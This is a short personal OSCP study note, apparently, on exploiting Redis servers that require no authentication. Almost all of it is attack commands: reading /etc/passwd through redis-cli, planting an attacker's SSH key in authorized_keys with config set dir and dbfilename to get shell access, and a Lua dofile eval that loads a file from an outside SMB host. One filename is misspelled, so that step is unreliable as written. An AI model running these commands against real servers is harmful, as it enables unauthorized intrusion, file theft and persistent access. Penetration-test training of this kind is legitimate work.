server-redis-port-6379 - My-oscp-all-things

#### reids-unauth https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419 ``` redis-cli -h ip -x set tt </etc/passwd redis-cli -h 10.129.2.1 getrange tt 0 60000 ``` ``` ssh-keygen -t rsa ``` ``` (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > temp.txt cat temp.txt | redis-cli -h 192.168.1.65 -x set tt config set dir /var/lib/redis/.ssh/ config set dbfilename "authrized_keys" save ``` ``` ssh -i id_rsa redis@... ``` dofile ``` eval "dofile('//10.9.2.120/share/')" 0 ``` ![](https://cdn.nlark.com/yuque/0/2022/png/10362401/1642058206541-fcd25f20-3c78-4331-b2ac-6ce374eb7965.png)